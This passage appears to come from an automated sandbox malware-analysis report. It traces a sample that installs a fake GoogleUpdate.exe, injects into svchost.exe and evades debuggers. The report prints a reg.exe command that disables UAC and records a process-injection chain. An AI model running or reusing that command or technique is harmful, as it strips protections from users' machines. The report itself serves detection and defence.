                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 10_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,10_2_0041A01B
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 10_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,10_2_0040B28E
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 10_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,10_2_0040838E
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 10_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,10_2_004087A0
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 10_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,10_2_00407848
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 10_2_004068CD FindFirstFileW,FindNextFileW,10_2_004068CD
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 10_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,10_2_0040AA71
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 10_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,10_2_00417AAB
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 10_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,10_2_0040AC78
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_02D5B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,13_2_02D5B28E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_02D5838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,13_2_02D5838E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_02D6A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,13_2_02D6A01B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_02D587A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,13_2_02D587A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_02D67AAB FindFirstFileW,FindNextFileW,FindNextFileW,13_2_02D67AAB
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_02D5AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,13_2_02D5AA71
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_02D568CD FindFirstFileW,FindNextFileW,13_2_02D568CD
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_02D57848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,13_2_02D57848
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_02D5AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,13_2_02D5AC78
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 15_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,15_2_0041A01B
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 15_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,15_2_0040B28E
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 15_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,15_2_0040838E
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 15_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,15_2_004087A0
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 15_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,15_2_00407848
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 15_2_004068CD FindFirstFileW,FindNextFileW,15_2_004068CD
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 15_2_0044BA59 FindFirstFileExA,15_2_0044BA59
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 15_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,15_2_0040AA71
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 15_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,15_2_00417AAB
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 15_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,15_2_0040AC78
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 18_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,18_2_0041A01B
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 18_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,18_2_0040B28E
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 18_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,18_2_0040838E
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 18_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,18_2_004087A0
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 18_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,18_2_00407848
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 18_2_004068CD FindFirstFileW,FindNextFileW,18_2_004068CD
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 18_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,18_2_0040AA71
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 18_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,18_2_00417AAB
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 18_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,18_2_0040AC78
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,0_2_00406D28
                  Source: GoogleUpdate.exe, 0000000A.00000002.4124186576.000000000068D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllB
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeAPI call chain: ExitProcess graph end nodegraph_10-45590
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeAPI call chain: ExitProcess graph end nodegraph_10-46637
                  Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004327AE
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,0_2_0041A8DA
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_004407B5 mov eax, dword ptr fs:[00000030h]0_2_004407B5
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 10_2_004407B5 mov eax, dword ptr fs:[00000030h]10_2_004407B5
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_02D907B5 mov eax, dword ptr fs:[00000030h]13_2_02D907B5
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 15_2_004407B5 mov eax, dword ptr fs:[00000030h]15_2_004407B5
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 18_2_004407B5 mov eax, dword ptr fs:[00000030h]18_2_004407B5
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_00410763 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,0_2_00410763
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004327AE
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_004328FC SetUnhandledExceptionFilter,0_2_004328FC
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_004398AC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004398AC
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_00432D5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00432D5C
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 10_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_004327AE
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 10_2_004328FC SetUnhandledExceptionFilter,10_2_004328FC
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 10_2_004398AC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_004398AC
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 10_2_00432D5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00432D5C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_02D827AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_02D827AE
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_02D828FC SetUnhandledExceptionFilter,13_2_02D828FC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_02D898AC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_02D898AC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_02D82D5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_02D82D5C
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 15_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_004327AE
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 15_2_004328FC SetUnhandledExceptionFilter,15_2_004328FC
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 15_2_004398AC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_004398AC
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 15_2_00432D5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_00432D5C
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 18_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_004327AE
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 18_2_004328FC SetUnhandledExceptionFilter,18_2_004328FC
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 18_2_004398AC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_004398AC
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 18_2_00432D5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_00432D5C

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 10_2_0041642D GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,10_2_0041642D
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2F88008Jump to behavior
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe0_2_00410B5C
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe10_2_00410B5C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe13_2_02D60B5C
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe15_2_00410B5C
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe18_2_00410B5C
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_004175E1 mouse_event,0_2_004175E1
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /fJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\ProgramData\GoogleDat\GoogleUpdate.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ProgramData\GoogleDat\GoogleUpdate.exe C:\ProgramData\GoogleDat\GoogleUpdate.exeJump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                  Source: GoogleUpdate.exe, 0000000A.00000002.4124186576.000000000068D000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000000A.00000002.4124186576.000000000073A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager.157:443
                  Source: GoogleUpdate.exe, 0000000A.00000002.4126961951.0000000002C24000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managero
                  Source: GoogleUpdate.exe, 0000000A.00000002.4124186576.000000000073A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managers.net,
                  Source: GoogleUpdate.exe, 0000000A.00000002.4124186576.000000000068D000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000000A.00000002.4124186576.000000000073A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manageres|
                  Source: GoogleUpdate.exe, 0000000A.00000002.4126961951.0000000002C24000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager,
                  Source: GoogleUpdate.exe, 0000000A.00000002.4124186576.000000000068D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managers.net2
                  Source: GoogleUpdate.exe, 0000000A.00000002.4124186576.000000000068D000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000000A.00000002.4124186576.000000000073A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager.157:4
                  Source: GoogleUpdate.exe, 0000000A.00000002.4124186576.000000000068D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managers.n
                  Source: GoogleUpdate.exe, 0000000A.00000002.4124186576.000000000068D000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000000A.00000002.4124186576.000000000073A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerknown.
                  Source: GoogleUpdate.exe, 0000000A.00000002.4124186576.000000000068D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager5948/jo
                  Source: GoogleUpdate.exe, 0000000A.00000002.4124186576.000000000073A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager.157:443GBI
                  Source: GoogleUpdate.exe, 0000000A.00000002.4124186576.000000000068D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managers.net
                  Source: GoogleUpdate.exe, 0000000A.00000002.4124186576.000000000068D000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000000A.00000002.4125655401.0000000002062000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000000A.00000002.4125655401.0000000002040000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                  Source: GoogleUpdate.exe, 0000000A.00000002.4124186576.000000000067B000.00000004.00000020.00020000.00000000.sdmp, logs.dat.10.drBinary or memory string: [Program Manager]
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_004329DA cpuid 0_2_004329DA
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: EnumSystemLocalesW,0_2_0044F17B
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: EnumSystemLocalesW,0_2_0044F130
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: EnumSystemLocalesW,0_2_0044F216
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0044F2A3
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: GetLocaleInfoA,0_2_0040E2BB
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: GetLocaleInfoW,0_2_0044F4F3
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0044F61C
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: GetLocaleInfoW,0_2_0044F723
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0044F7F0
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: EnumSystemLocalesW,0_2_00445914
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: GetLocaleInfoW,0_2_00445E1C
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_0044EEB8
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: GetLocaleInfoA,10_2_0040E2BB
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: EnumSystemLocalesW,10_2_0044F17B
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: EnumSystemLocalesW,10_2_0044F130
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: EnumSystemLocalesW,10_2_0044F216
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,10_2_0044F2A3
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: GetLocaleInfoW,10_2_0044F4F3
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,10_2_0044F61C
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: GetLocaleInfoW,10_2_0044F723
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,10_2_0044F7F0
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: EnumSystemLocalesW,10_2_00445914
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: GetLocaleInfoW,10_2_00445E1C
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,10_2_0044EEB8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,13_2_02D5E2BB
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,13_2_02D9F2A3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: EnumSystemLocalesW,13_2_02D9F216
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: EnumSystemLocalesW,13_2_02D9F17B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: EnumSystemLocalesW,13_2_02D9F130
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,13_2_02D9F61C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,13_2_02D9F7F0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,13_2_02D9F723
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,13_2_02D9F4F3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: EnumSystemLocalesW,13_2_02D95914
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,13_2_02D9EEB8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,13_2_02D95E1C
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: EnumSystemLocalesW,15_2_0044F17B
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: EnumSystemLocalesW,15_2_0044F130
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: EnumSystemLocalesW,15_2_0044F216
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,15_2_0044F2A3
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: GetLocaleInfoA,15_2_0040E2BB
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: GetLocaleInfoW,15_2_0044F4F3
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,15_2_0044F61C
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: GetLocaleInfoW,15_2_0044F723
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,15_2_0044F7F0
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: EnumSystemLocalesW,15_2_00445914
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: GetLocaleInfoW,15_2_00445E1C
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,15_2_0044EEB8
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: EnumSystemLocalesW,18_2_0044F17B
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: EnumSystemLocalesW,18_2_0044F130
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: EnumSystemLocalesW,18_2_0044F216
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,18_2_0044F2A3
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: GetLocaleInfoA,18_2_0040E2BB
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: GetLocaleInfoW,18_2_0044F4F3
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,18_2_0044F61C
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: GetLocaleInfoW,18_2_0044F723
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,18_2_0044F7F0
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: EnumSystemLocalesW,18_2_00445914
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: GetLocaleInfoW,18_2_00445E1C
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,18_2_0044EEB8
                  Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_0040A0B0 GetLocalTime,wsprintfW,0_2_0040A0B0
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_004195F8 GetComputerNameExW,GetUserNameW,0_2_004195F8
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_004468DC _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_004468DC
                  Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Lowering of HIPS / PFW / Operating System Security Settings

                  barindex
                  Source: C:\Windows\SysWOW64\reg.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUAJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: DB5rQYsfd6.exe, type: SAMPLE
                  Source: Yara matchFile source: 20.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 18.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.GoogleUpdate.exe.2a00000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.svchost.exe.2d50000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.svchost.exe.2d50000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
